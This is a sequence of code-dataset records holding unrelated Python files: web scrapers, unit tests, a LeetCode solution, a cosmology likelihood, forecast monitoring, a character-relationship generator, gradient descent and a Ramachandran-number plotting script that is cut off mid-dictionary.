:return:\n \"\"\"\n client = pymongo.MongoClient(MONGO_URL)\n db = client[MONGO_DB]\n collection = db[MONGO_COLLECTION]\n try:\n if collection.insert_one(news):\n print('存储到Mongodb成功!')\n except Exception:\n print('存储到Mongodb失败!')\n\n\ndef start_spider():\n offset = 0\n news_list = []\n # 初次获取列表页\n data_list = get_data_list(offset)\n while data_list:\n print('请求到第%d组数据~' % int(offset / 20))\n # 对原生的新闻列表进行提取,返回所需的新闻字典对象的列表(未请求详情内容)\n # 并添加进新闻列表\n news_list.extend(parse_data_list(data_list))\n\n # 请求下一组原生新闻列表页\n time.sleep(3)\n offset += 20\n # 返回为None时,说明json中data为空,即刷新到尾部,可以停止\n data_list = get_data_list(offset)\n\n # for news in news_list:\n # print(news)\n\n # 对所有的当天新闻,进行发送邮件,以及保存数据库操作\n if send_email(news_list):\n print('邮件已发出')\n\n for news in news_list:\n # 获取详情页html\n detail_html = get_news_detail(news['source_url'])\n # 提取js中的文章数据,转换为HTML,剔除img标签,提取文本\n article = parse_news_detail(detail_html)\n # 文章文本内容保存进字典\n news['article'] = article\n # 对单则新闻进行保存操作\n save_to_mongodb(news)\n\n\nif __name__ == '__main__':\n MONGO_URL = 'localhost'\n MONGO_DB = 'news_spider_db'\n MONGO_COLLECTION = 'news'\n\n start_spider()\n\n","sub_path":"daily_news_spider.py","file_name":"daily_news_spider.py","file_ext":"py","file_size_in_byte":7560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"428761422","text":"import sys\nimport json\nimport os\nimport re\nimport csv\nimport logging\nlogger = logging.getLogger()\n\nimport requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\nfrom bs4 import BeautifulSoup\nfrom retry import retry\n\ndef setSNSLinksToData(url, data):\n if url.find(\"facebook.com/\") > 0 or url.find(\"instagram.com/\") > 0 or url.find(\"twitter.com/\") > 0:\n return\n \n soup = getBeautifulSoup(url)\n aList = soup.find_all(\"a\")\n for aItem in aList:\n try:\n link = aItem[\"href\"]\n setLinkToData(link, data)\n except:\n continue\n \n@retry(tries=3, delay=3)\ndef getBeautifulSoup(url):\n response = requests.get(url, verify=False)\n response.encoding = response.apparent_encoding\n soup = BeautifulSoup(response.text, \"html.parser\")\n logger.info(\"soup link : {0}\".format(url))\n logger.info(\"soup title : {0}\".format(soup.title))\n return soup\n\ndef setLinkToData(url, data):\n if url.find(\"facebook.com/\") > 0 and url.find(\".php?\") < 0 and url.find(\"facebook.com/WixJapan\") < 0:\n if isPage(url, \"facebook.com\"):\n data[\"facebook\"] = trimParam(url)\n elif url.find(\"instagram.com/\") > 0:\n if isPage(url, \"instagram.com\"):\n data[\"instagram\"] = trimParam(url)\n elif url.find(\"twitter.com/\") > 0 and url.find(\"twitter.com/share\") < 0 and url.find(\"twitter.com/intent/\") < 0 and url.find(\"twitter.com/WixJp\") < 0:\n if isPage(url, \"twitter.com\"):\n data[\"twitter\"] = trimParam(url)\n\ndef trimParam(url):\n if url.find(\"?\") > 0:\n url = url[:url.find(\"?\")]\n return url\n\ndef isPage(url, domain):\n tmp = url.replace(\"https://\", \"\").replace(\"www\", \"\").replace(domain, \"\").replace(\".\", \"\").replace(\"/\", \"\")\n return len(tmp) > 1\n","sub_path":"source_h3/importer_util.py","file_name":"importer_util.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"539728958","text":"import os,unittest\nfrom igf_data.utils.fileutils import get_temp_dir,remove_dir\nfrom igf_data.utils.singularity_run_wrapper import singularity_run\nfrom igf_data.utils.singularity_run_wrapper import execute_singuarity_cmd\n\n\nclass Singularity_run_test1(unittest.TestCase):\n def setUp(self):\n self.temp_dir = get_temp_dir()\n self.image_path = os.path.join(self.temp_dir,'image.sif')\n with open(self.image_path,'w') as fp:\n fp.write('a')\n\n def tearDown(self):\n remove_dir(self.temp_dir)\n\n def test_singularity_run(self):\n singularity_cmd = \\\n singularity_run(\n image_path=self.image_path,\n bind_dir_list=[self.temp_dir],\n args_list=['ls','-l','/home/vmuser'],\n dry_run=True)\n self.assertTrue('{0} --bind {1} ls -l /home/vmuser'.\\\n format(os.path.basename(self.image_path),[self.temp_dir]) \\\n in singularity_cmd)\n\n def test_execute_singuarity_cmd(self):\n singularity_cmd = \\\n execute_singuarity_cmd(\n image_path=self.image_path,\n bind_dir_list=[self.temp_dir],\n command_string='ls -l /home/vmuser',\n dry_run=True)\n self.assertEqual('singularity exec --bind {1} {0} ls -l /home/vmuser'.\\\n format(self.image_path,[self.temp_dir]),\n singularity_cmd)\n\nif __name__=='__main__':\n unittest.main()","sub_path":"test/utils/singularity_run_wrapper_test.py","file_name":"singularity_run_wrapper_test.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"191117528","text":"#\n# @lc app=leetcode.cn id=485 lang=python3\n#\n# [485] 最大连续1的个数\n#\n# https://leetcode-cn.com/problems/max-consecutive-ones/description/\n#\n# algorithms\n# Easy (54.99%)\n# Likes: 72\n# Dislikes: 0\n# Total Accepted: 24.5K\n# Total Submissions: 44.4K\n# Testcase Example: '[1,0,1,1,0,1]'\n#\n# 给定一个二进制数组, 计算其中最大连续1的个数。\n# \n# 示例 1:\n# \n# \n# 输入: [1,1,0,1,1,1]\n# 输出: 3\n# 解释: 开头的两位和最后的三位都是连续1,所以最大连续1的个数是 3.\n# \n# \n# 注意:\n# \n# \n# 输入的数组只包含 0 和1。\n# 输入数组的长度是正整数,且不超过 10,000。\n# \n# \n#\n\n# @lc code=start\nfrom typing import List\n\n\nclass Solution:\n def findMaxConsecutiveOnes(self, nums: List[int]) -> int:\n # return max(map(len, \"\".join(map(str, nums)).split(\"0\")))\n\n c = max_c = 0\n for n in nums:\n if n == 1:\n c += 1\n else:\n max_c = max(max_c, c)\n c = 0\n return max(max_c, c)\n\n# @lc code=end\n","sub_path":"easy/485.最大连续-1-的个数.py","file_name":"485.最大连续-1-的个数.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"235065105","text":"import os\nimport numpy as np\nfrom montepython.likelihood_class import Likelihood\nimport montepython.io_mp as io_mp\nimport warnings\n\n\nclass growth(Likelihood):\n\n # initialization routine\n\n def __init__(self, path, data, command_line):\n\n Likelihood.__init__(self, path, data, command_line)\n\n # define array for values of z and data points\n self.z = np.array([], 'float64')\n self.data = np.array([], 'float64')\n self.error = np.array([], 'float64')\n\n # read redshifts and data points\n with open(os.path.join(self.data_directory, self.file), 'r') as filein:\n for line in filein:\n if line.find('#') == -1:\n # the first entry of the line is the identifier\n this_line = line.split()\n self.z = np.append(self.z, float(this_line[1]))\n self.data = np.append(self.data, float(this_line[2]))\n self.error = np.append(self.error, float(this_line[3]))\n\n # number of data points\n self.num_points = np.shape(self.z)[0]\n\n # end of initialization\n\n # compute likelihood\n\n def loglkl(self, cosmo, data):\n\n chi2 = 0.\n\n # for each point, compute growth rate f, power spectrum normalization sig8,\n # theoretical prediction and chi2 contribution\n\n for i in range(self.num_points):\n\n s8 = cosmo.sigma8_at_z(self.z[i])\n f = cosmo.growthrate_at_z(self.z[i])\n theo = f*s8\n\n chi2 += ((theo - self.data[i]) / self.error[i]) ** 2\n\n # return ln(L)\n lkl = - 0.5 * chi2\n return lkl\n","sub_path":"montepython/likelihoods/growth/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"274853021","text":"import glob\nimport os\nimport sys\nimport fileinput\nfrom configparser import RawConfigParser\ndef main():\n\tpath = os.path.realpath('Config_files')\n\tpath = path +\"/*.ini\"\n\tconfig = RawConfigParser()\n\tconfig.optionxform=str\n\tconfig.read(os.path.abspath('replace.ini'))\n\tlist_files = glob.glob(path)\n\tfor file_name in list_files:\n\t\tfor section in config.sections():\n\t\t\tfor key in config.options(section):\n\t\t\t\tvalue = config.get(section, key)\n\t\t\t\tfun(file_name, key, value)\n\t\t\t\ndef fun(file_name, key, value): \n\tfile1 = fileinput.FileInput(file_name, inplace=1)\n\tfor line in file1:\n\t\tif key in line: \n\t\t\tline = line.replace(key, value)\n\t\tsys.stdout.write(line)\n\tfile1.close()\n\nmain()\n","sub_path":"Controller_Automation/list_file.py","file_name":"list_file.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"264754069","text":"from dvik_loop import Loop2Series\nimport datetime\nimport os\nimport re\nimport json\n\nDEBUG = True\n\n\ndef process(html_dir: str, forecast_dir: str, loop2_dir: str, days: int):\n if DEBUG:\n print('-------------------------------')\n print(' processing forecast monitoring')\n print(f\" html_dir: {html_dir}\")\n print(f\" forecast_dir: {forecast_dir}\")\n print(f\" loop2_dir: {loop2_dir}\")\n print(f\" days: {days}\")\n print('-------------------------------')\n\n end_dt = datetime.datetime.utcnow()\n start_dt = end_dt - datetime.timedelta(days=days)\n\n l2s = None\n for m in range(15):\n try:\n print(\"[INFO] Próbuję pobrać dane LOOP2 dla end_dt = {}\".format(end_dt - datetime.timedelta(minutes=m)))\n l2s = Loop2Series(loop2_dir, start_dt, end_dt - datetime.timedelta(minutes=m), interval=0.25)\n break\n except ValueError:\n print(\"[WARNING] Nie udało się pobrać danych LOOP2 dla end_dt = {}.\".format(\n end_dt - datetime.timedelta(minutes=m)))\n if l2s is None:\n msg = \"Nie udało się pobrać danych LOOP2.\"\n print(\"[ERROR] {}\".format(msg))\n raise ValueError(msg)\n\n json_path = os.path.join(html_dir, 'forecast.json')\n\n params = get_params(forecast_dir)\n res_dict = get_res_dict(params, l2s, start_dt)\n print(list(res_dict.keys()))\n json.dump(res_dict, open(json_path, 'w'))\n print(f\"[INFO] zapisano {json_path}\")\n\n\ndef get_params(forecast_dir: str):\n params = []\n for f in os.listdir(forecast_dir):\n f_name = f[:-5]\n f_path = os.path.join(forecast_dir, f)\n fn_parts = f_name.split('_')\n dt, param, horizon, hours = fn_parts\n dt = datetime.datetime.strptime(dt, \"%y%m%d%H%M\")\n param = {\n 'temp': 'avg_temp',\n 'ptemp': 'pca_avg_temp',\n 'wiatr': 'avg_wind',\n }[param]\n horizon = int(horizon)\n hours = int(hours)\n params.append({\n 'dt': dt,\n 'param': param,\n 'horizon': horizon,\n 'hours': hours,\n 'file': f_path,\n })\n return params\n\n\ndef _get_nearest_dt(dt: datetime.datetime) -> datetime.datetime:\n if dt.minute % 15 > 7:\n dt += datetime.timedelta(minutes=15 - dt.minute % 15)\n else:\n dt -= datetime.timedelta(minutes=dt.minute % 15)\n return dt\n\n\ndef _get_predictions(fpath: str):\n pr_dict = json.load(open(fpath, 'r'))\n return pr_dict['simple'], pr_dict['mean'], pr_dict.get('complex')\n\n\ndef get_res_dict(params: list, l2s: Loop2Series, start_dt: datetime.datetime) -> dict:\n l2data = l2s.get_data()\n res_dict = {}\n for pd in params:\n dt = pd['dt']\n if dt < start_dt:\n continue\n dt_str = dt.strftime(\"%Y-%m-%d %H:%M\")\n nr_dt = _get_nearest_dt(dt)\n param = pd['param']\n horizon = pd['horizon']\n hours = pd['hours']\n fpath = pd['file']\n\n try:\n simple_pr, mean_pr, complex_pr = _get_predictions(fpath)\n except json.decoder.JSONDecodeError:\n continue\n try:\n if param.startswith('pca_'):\n l2_val = l2data[nr_dt][param[4:]]\n else:\n l2_val = l2data[nr_dt][param]\n except KeyError:\n l2_val = None\n if not param in res_dict:\n res_dict[param] = {}\n if not horizon in res_dict[param]:\n res_dict[param][horizon] = {}\n if not hours in res_dict[param][horizon]:\n res_dict[param][horizon][hours] = {}\n res_dict[param][horizon][hours][dt_str] = {\n 'loop2': l2_val,\n 'simple': simple_pr,\n 'mean': mean_pr,\n 'complex': complex_pr,\n }\n return res_dict\n","sub_path":"dvik_monitoring/bin/forecast_monitoring.py","file_name":"forecast_monitoring.py","file_ext":"py","file_size_in_byte":3800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"316843753","text":"import random\n\nimport cast\nfrom relationships import relType as rType\nfrom cast import ConnectionStrategy\nfrom characters import character\n\n# Create graph\nc = cast.cast()\n# Add characters\ntotalCharacters = random.randint(4, 15)\n#totalCharacters = 4\nprint(\"TOTAL CHARACTERS: \" + str(totalCharacters))\nfor n in range(totalCharacters):\n c.addCharacter(character())\n\n# GENERATE FAMILIAL RELATIONSHIP NETWORK\nnumFamilies = (int(totalCharacters/6), int(totalCharacters/3))\nnumFamilyMembers = (max(2, int(totalCharacters/6)), int(totalCharacters/3))\nif (numFamilies[1] * numFamilyMembers[1] > totalCharacters):\n print(\"WARNING: May have too few characters for max possible families and members\")\nprint(\"Family parameters: number\" + str(numFamilies) + \", size\" + str(numFamilyMembers))\n\n# GENERATE ROMANTIC RELATIONSHIP NETWORK\nnumRomances = int(0.5 * totalCharacters)\n\n# GENERATE PROFESSIONAL RELATIONSHIP NETWORK\nnumEmployers = (int(totalCharacters/6), int(totalCharacters/3))\nnumEmployees = (max(2, int(totalCharacters/6)), int(totalCharacters/3))\nif (numEmployers[1] * numEmployees[1] > totalCharacters):\n print(\"WARNING: May have too few characters for max possible professional relationships\")\nprint(\"Professional parameters: number\" + str(numEmployers) + \", size\" + str(numEmployees))\n\n# GENERATE SOCIAL RELATIONSHIP NETWORK\nnumSocialGroups = (int(totalCharacters/6), int(totalCharacters/3))\nnumSocialites = (max(2, int(totalCharacters/6)), int(totalCharacters/3))\nif (numSocialGroups[1] * numSocialites[1] > totalCharacters):\n print(\"WARNING: May have too few characters for max possible social relationships\")\nprint(\"Social parameters: number\" + str(numSocialGroups) + \", size\" + str(numSocialites))\n\nc.generateRelationshipGroupings(rType.familial, 1, numFamilies, numFamilyMembers, ConnectionStrategy.totallyConnect)\nc.generateRelationshipGroupings(rType.romantic, -1, (numRomances, numRomances), (2,2), ConnectionStrategy.totallyConnect)\nc.generateRelationshipGroupings(rType.professional, 3, numEmployers, numEmployees, ConnectionStrategy.randomlyConnect)\nc.generateRelationshipGroupings(rType.social, 3, numSocialGroups, numSocialites, ConnectionStrategy.randomlyConnect)\n# Generate non-plot families (wip)\n#c.generateRelationshipGroupings(rType.familial, 1, (totalCharacters,totalCharacters), (1,1), ConnectionStrategy.totallyConnect)\n\nc.createRelationshipEntities()\n\n# Fill in remaining details\nc.generateNonPlotFamilies()\n\n# Print names\nprint(\"- Relationships -\")\nfor char in c.characters:\n print(char.getFullName() + \" [\" + str(char.id) + \"]\")\n for relation in char.typesByRelation.keys():\n print(\" - \" + relation.getFullName() + \" [\" + str(relation.id) + \"] \" + \"(\" + str([x.type.name for x in char.typesByRelation[relation]]) + \")\")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"344259344","text":"#!/usr/bin/python3\nimport numpy as np\nfrom scipy import linalg\nimport matplotlib.pyplot as plt\n\n# the cost function J\ndef costFunction(theta,X,y,m):\n Z = X.dot(theta) - y\n return (0.5/m)*(np.dot(Z.T,Z))\n\n# gradient descent algorithm\ndef gradientDescent(theta , X , y , m , alpha = 0.037 , eps = 1e-8, maxIter=100000):\n # converting al the matrix to float type\n theta = np.array(theta).astype(float)\n X = np.array(X).astype(float)\n y = np.array(y).astype(float)\n # printing the shape of theta (rows)X(columns)\n print(\"theta \" , np.shape(theta))\n # iteration number : iter\n iter =0\n # prev : MSE for previous iterarion\n prev = costFunction(theta, X, y, m)\n # loop till you reach convergence\n while iter)\nfilename.rcode.his.eps (y-axis: Ramachandran number (R); color: frequency of R in model)\nfilename.rcode.rmsf.eps (y-axis: residue #; color: RMSF in R from the previous model)\n---------------\nAdditional tags\n---------------\n-h - Prints this message\n-ss - Color the ramachandran number codes (R-codes) by \n secondary structure (default: color by chirality and sign)\n-signed - Use the signed version of the ramachandran number\n-target - Target directory to save output\n-rmsd - Also producee \"filename.rcode.rmsd.eps\"\n (y-axis: residue #; color: RMSD in R from first model)\n---------------\nEach graph is also accompanied by \"_colorbar.eps\", which are keys.\n---------------\nThe Ramachandran number concept is discussed in the following manuscripts (this tool is discussed in the first reference):\n1. Mannige (2018) \"A simpler Ramachandran number can simplify the life of a protein simulator\" Manuscript Prepared/Submitted\n2. Mannige, Kundu, Whitelam (2016) \"The Ramachandran number: an order parameter for protein geometry\" PLoS ONE 11(8): e0160023. \nFull Text: https://doi.org/10.1371/journal.pone.0160023\n============================================\n\"\"\"\n\n# Standard imports\nimport sys,re,os,math\n\n# Commonly available imports\nimport copy,string,glob\nimport numpy as np\n\n# matplotlib imports\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import LinearSegmentedColormap\n# Biopython (can do without)\ntry:\n\tbiopython = True\n\tfrom Bio import PDB\nexcept:\n\tbiopython = False\n#\n\ndef normalized_ramachandran_number(phi,psi,signed=False):\n\tr = (phi+psi+360)/720.0\n\t#\n\tif signed:\n\t\tif psi < phi:\n\t\t\tr = r * -1.0\n\t\t#\n\t#\n\treturn r\n#\n\ndef ramachandran_number(phi,psi,signed=False):\n\treturn normalized_ramachandran_number(phi,psi,signed)\n#\n\ndef r(phi,psi,signed=False):\n\treturn normalized_ramachandran_number(phi,psi,signed)\n#\n\ndef R(phi,psi,signed=False):\n\treturn normalized_ramachandran_number(phi,psi,signed)\n#\n\n#sys.path.insert(0, \"./local_imports/\") # for the local imports\n#import Geometry, PeptideBuilder, locallib\n\nsigned = 0\nrrange = [0,1]\ncolortype = \"Chirality\" # can be SecondaryStructure\n\nshoweps = 0\ndofilter = 0\n\nshowrcode = 1\nshowhis = 1\nshowrmsf = 1\nshowrmsd = 0\ndo_vmd_etc = 1\n\nbins = 100\npdbfn = \"\"\n\n# python plotmap.py -pdb /home/ranjan/Desktop/old/pairing_functions/for_sharing/structures/nanosheet_birth_U7.pdb\n# python plotmap.py -pdb /home/ranjan/Desktop/old/pairing_functions/for_sharing/structures/nanosheet_traj.pdb\n# python plotmap.py -pdb /home/ranjan/Desktop/old/pairing_functions/for_sharing/structures/class_a_alpha_1MBA.pdb\n# python plotmap.py -pdb /home/ranjan/Desktop/old/pairing_functions/for_sharing/structures/class_c_a_plus_b_2ACY.pdb\n\n\nforcedmax = False\nforcedmin = False\n\nshow_graphs = 1\ndefault_fontsize = 22\ncolorbarXscaling = 0.08\ndefaultXscaling = 2.0\n\nSCALE = 10.0 # For the postscript output\n\n\n# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n# SETTING UP SOME COLORMAPS\n\nCOLORSWITCH = 0.5 # THIS IS THE POINT, FOR THE RED/BLUE AND RED/BLUE/YELLOW/BLACK \n # COLOR SCHEME, WHERE THE SWITCH IN COLOR HAPPENS (NAIVELY 0.5, \n # BUT BETA SHEETS SPILL TO THE \"D\" PORTION OF THE PLOT, SO IT \n # IS 0.45\n\n# First, some definitions:\n# DEFINING COLORS BY CHIRALITY:\n# c stands for color, bc stands for background color \n # when R ranges from [-1,1] (\"Signed R\") [0,1] (Traditional R)\n # ------------ -----------\nc1 = [0,0,0] # black | \\_ c4 / | |\\_ c4 |\nc2 = [1,1,0] # yellow | \\_ / | | \\_ |\nc3 = [1,0,0] # red psi |c3 /\\_c2 | psi | \\_ |\nc4 = [0,0,1] # blue | / \\_ | | \\_ |\nbc = [1,1,1] # white |/ c1 \\| |c3 \\|\n # ------------ -----------\n # phi phi\n# DEFINING POSITIONS AND COLORS BY SECONDARY STRUCTURE:\n# POSITIONS\nhelix_start = 0.31 # the start of the helical region (all assuming R in [0,1])\nhelix_end = 0.39 # the end of the helical region\nsheet_start = 0.45 # the start of the sheet region\nsheet_end = 0.62 # the end of the sheet region\npolyproline_end = 0.66 # the end of the polyprolineII region \n # (the start coincides with the sheet region, \n # so it just begins after the sheet region ends)\n# COLORS\nhelixR = (1.,0.,0.)\nsheet = (0.,0.,1.)\npolyproline = (0.,1.,1.)\n\n# ----------------\n# NEW COLOR SCHEME: color by backbone twist (expected range: R=[0,1])\n# ----------------\n# This lets you later on get the cmap by name 'TwoColor': cmap = plt.get_cmap('TwoColor')\n# POSITION: 0 COLORSWITCH 1\n# COLOR: | white - red | blue - white |\ncdict = {\n# white white red blue white white\n\t'red': ((0.00, bc[0], bc[0]), (COLORSWITCH, c3[0], c4[0]), (1.0, bc[0], bc[0])), \n\t'green': ((0.00, bc[1], bc[1]), (COLORSWITCH, c3[1], c4[1]), (1.0, bc[1], bc[1])),\n\t'blue': ((0.00, bc[2], bc[2]), (COLORSWITCH, c3[2], c4[2]), (1.0, bc[2], bc[2])) \n}\ncmap = LinearSegmentedColormap('Chirality', cdict)\nplt.register_cmap(cmap=cmap)\n# ----------------\n# NEW COLOR SCHEME: color by backbone twist, variant (expected range: R=[0,1])\n# ----------------\ncdict = {\n# white white blue blue\n\t'red': ((0.00, bc[0], bc[0]), (1.0, c4[0], c4[0])), \n\t'green': ((0.00, bc[1], bc[1]), (1.0, c4[1], c4[1])),\n\t'blue': ((0.00, bc[2], bc[2]), (1.0, c4[2], c4[2]))\n}\ncmap = LinearSegmentedColormap('deleteme', cdict)\nplt.register_cmap(cmap=cmap)\ncdict = {\n# white white blue blue\n\t'red': ((0.00, 1, 1), (0.5, bc[0], bc[0]), (1.0, c4[0], c4[0])), \n\t'green': ((0.00, 0, 0\t), (0.5, bc[1], bc[1]), (1.0, c4[1], c4[1])),\n\t'blue': ((0.00, 1, 1), (0.5, bc[2], bc[2]), (1.0, c4[2], c4[2])) \n}\ncmap = LinearSegmentedColormap('deletemeSigned', cdict)\nplt.register_cmap(cmap=cmap)\n# ----------------\n# NEW COLOR SCHEME: color by backbone twist, variant (expected range: R=[0,1])\n# ----------------\n# This lets you later on get the cmap by name 'TwoColorInverted': cmap = plt.get_cmap('TwoColorInverted')\n# POSITION: 0 0.25 0.5 0.75 1\n# COLOR: | white - black | yellow - white | white - red | blue - white |\ncdict = {\n# red red white white blue blue\n\t'red': ((0.00, c3[0], c3[0]), (COLORSWITCH, bc[0], bc[0]), (1.0, c4[0], c4[0])), \n\t'green': ((0.00, c3[1], c3[1]), (COLORSWITCH, bc[1], bc[1]), (1.0, c4[1], c4[1])),\n\t'blue': ((0.00, c3[2], c3[2]), (COLORSWITCH, bc[2], bc[2]), (1.0, c4[2], c4[2])) \n}\ncmap = LinearSegmentedColormap('Chirality_r', cdict)\nplt.register_cmap(cmap=cmap)\n# ----------------\n# NEW COLOR SCHEME: color by backbone twist (expected range: R=[-1,1])\n# ----------------\n# This lets you later on get the cmap by name 'FourColor': cmap = plt.get_cmap('FourColor')\n# POSITION: 0 0.25 0.5 0.75 1\n# COLOR: | white - black | yellow - white | white - red | blue - white |\ncdict = {\n# white white black yellow white white white white blue blue\n\t'red': ((0.00, bc[0], bc[0]), (0.25, c1[0], c2[0]), (0.50, bc[0], bc[0]), (0.75, c3[0], c4[0]), (1.0, bc[0], bc[0])), \n\t'green': ((0.00, bc[1], bc[1]), (0.25, c1[1], c2[1]), (0.50, bc[1], bc[1]), (0.75, c3[1], c4[1]), (1.0, bc[1], bc[1])),\n\t'blue': ((0.00, bc[2], bc[2]), (0.25, c1[2], c2[2]), (0.50, bc[2], bc[2]), (0.75, c3[2], c4[2]), (1.0, bc[2], bc[2])) \n}\ncmap = LinearSegmentedColormap('ChiralityFourColor', cdict)\nplt.register_cmap(cmap=cmap)\n# ----------------\n# NEW COLOR SCHEME: color by backbone twist, variant (expected range: R=[-1,1])\n# ----------------\n# This lets you later on get the cmap by name 'FourColorInverted': cmap = plt.get_cmap('FourColorInverted')\n# POSITION: 0 0.25 0.5 0.75 1\n# COLOR: | black - white | white - yellow | red - white | white - blue |\ncdict = {\n# black black white white yellow red white white blue blue\n\t'red': ((0.00, c1[0], c1[0]), (0.25, bc[0], bc[0]), (0.50, c2[0], c3[0]), (0.75, bc[0], bc[0]), (1.0, c4[0], c4[0])), \n\t'green': ((0.00, c1[1], c1[1]), (0.25, bc[1], bc[1]), (0.50, c2[1], c3[1]), (0.75, bc[1], bc[1]), (1.0, c4[1], c4[1])),\n\t'blue': ((0.00, c1[2], c1[2]), (0.25, bc[2], bc[2]), (0.50, c2[2], c3[2]), (0.75, bc[2], bc[2]), (1.0, c4[2], c4[2])) \n}\ncmap = LinearSegmentedColormap('Chirality_rFourColor', cdict)\nplt.register_cmap(cmap=cmap)\n# -------------------------\n# NEW COLOR SCHEME: secondary structure (expected range: R=[0,1])\n# ----------------\n# This lets you later on get the cmap by name 'SecondaryStructure': cmap = plt.get_cmap('SecondaryStructure')\n#\n# white white white red red white white blue blue cyan cyan white white\ncdict = { # | | | | | | | | | | | | |\n 'red': ((0.00, bc[0], bc[0]), (helix_start, bc[0], helixR[0]), (helix_end, helixR[0], bc[0]), (sheet_start, bc[0], sheet[0]), (sheet_end, sheet[0], polyproline[0]), (polyproline_end, polyproline[0], bc[0]), (1, bc[0],bc[0])), \n 'green': ((0.00, bc[1], bc[1]), (helix_start, bc[1], helixR[1]), (helix_end, helixR[1], bc[1]), (sheet_start, bc[1], sheet[1]), (sheet_end, sheet[1], polyproline[1]), (polyproline_end, polyproline[1], bc[1]), (1, bc[1],bc[1])),\n 'blue': ((0.00, bc[2], bc[2]), (helix_start, bc[2], helixR[2]), (helix_end, helixR[2], bc[2]), (sheet_start, bc[2], sheet[2]), (sheet_end, sheet[2], polyproline[2]), (polyproline_end, polyproline[2], bc[2]), (1, bc[2],bc[2]))\n }\ncmap = LinearSegmentedColormap('SecondaryStructureHard', cdict)\nplt.register_cmap(cmap=cmap)\n# -------------------------\n# NEW COLOR SCHEME: secondary structure (expected range: R=[0,1])\ndef border_mod(v):\n\t# Old min/max\n\t# 0 1\n\t# | v |\n\t# to:\n\t# New min/max\n\t# 0.9 1\n\t# |v |\n\told_min = 0.0; old_max=1.0\n\tnew_min = 0.9; new_max=1.0\n\treturn new_min + (new_max-new_min)*(v-old_min)/(old_max-old_min)\n#\n# white white white red (ish) red red red(ish) white white blue(ish) blue blue blue(ish) cyan cyan(ish) white white white\ncdict = { # | | | | | | | | | | | | | | | | | | \n 'red': ((0.00, bc[0], bc[0]), (helix_start, bc[0], border_mod(helixR[0])), ((helix_start+helix_end)/2.0, helixR[0], helixR[0]), (helix_end, border_mod(helixR[0]), bc[0]), (sheet_start, bc[0], border_mod(sheet[0])), ((sheet_start+sheet_end)/2.0, sheet[0], sheet[0]), (sheet_end, border_mod(sheet[0]), polyproline[0]), (polyproline_end, border_mod(polyproline[0]), bc[0]), (1, bc[0],bc[0])),\n 'green': ((0.00, bc[1], bc[1]), (helix_start, bc[1], border_mod(helixR[1])), ((helix_start+helix_end)/2.0, helixR[1], helixR[1]), (helix_end, border_mod(helixR[1]), bc[1]), (sheet_start, bc[1], border_mod(sheet[1])), ((sheet_start+sheet_end)/2.0, sheet[1], sheet[1]), (sheet_end, border_mod(sheet[1]), polyproline[1]), (polyproline_end, border_mod(polyproline[1]), bc[1]), (1, bc[1],bc[1])), \n 'blue': ((0.00, bc[2], bc[2]), (helix_start, bc[2], border_mod(helixR[2])), ((helix_start+helix_end)/2.0, helixR[2], helixR[2]), (helix_end, border_mod(helixR[2]), bc[2]), (sheet_start, bc[2], border_mod(sheet[2])), ((sheet_start+sheet_end)/2.0, sheet[2], sheet[2]), (sheet_end, border_mod(sheet[2]), polyproline[2]), (polyproline_end, border_mod(polyproline[2]), bc[2]), (1, bc[2],bc[2]))\n }\ncmap = LinearSegmentedColormap('SecondaryStructure', cdict)\nplt.register_cmap(cmap=cmap)\n# ----------------\n# NEW COLOR SCHEME: color by secondary structure (expected range: R=[-1,1])\n# ----------------\n# POSITION (MIRRORRED AROUND 0): 0 helix_start helix_end sheet_start sheet_end polyproline_end 1\n# COLOR: | white - white | helixR - helixR | white - white | sheet - sheet | polyproline - polyproline | white - white |\ncdict = { \n 'red': [[-1, bc[0], bc[0]], [polyproline_end*-1, bc[0],polyproline[0]], [sheet_end*-1, polyproline[0],sheet[0]], [sheet_start*-1, sheet[0], bc[0]], [helix_end*-1, bc[0],helixR[0]], [helix_start*-1, helixR[0],bc[0]], [helix_start, bc[0], helixR[0]], [helix_end, helixR[0], bc[0]], [sheet_start, bc[0], sheet[0]], [sheet_end, sheet[0], polyproline[0]], [polyproline_end, polyproline[0], bc[0]], [1, bc[0],bc[0]]],\n 'green': [[-1, bc[1], bc[1]], [polyproline_end*-1, bc[1],polyproline[1]], [sheet_end*-1, polyproline[1],sheet[1]], [sheet_start*-1, sheet[1], bc[1]], [helix_end*-1, bc[1],helixR[1]], [helix_start*-1, helixR[1],bc[1]], [helix_start, bc[1], helixR[1]], [helix_end, helixR[1], bc[1]], [sheet_start, bc[1], sheet[1]], [sheet_end, sheet[1], polyproline[1]], [polyproline_end, polyproline[1], bc[1]], [1, bc[1],bc[1]]], \n 'blue': [[-1, bc[2], bc[2]], [polyproline_end*-1, bc[2],polyproline[2]], [sheet_end*-1, polyproline[2],sheet[2]], [sheet_start*-1, sheet[2], bc[2]], [helix_end*-1, bc[2],helixR[2]], [helix_start*-1, helixR[2],bc[2]], [helix_start, bc[2], helixR[2]], [helix_end, helixR[2], bc[2]], [sheet_start, bc[2], sheet[2]], 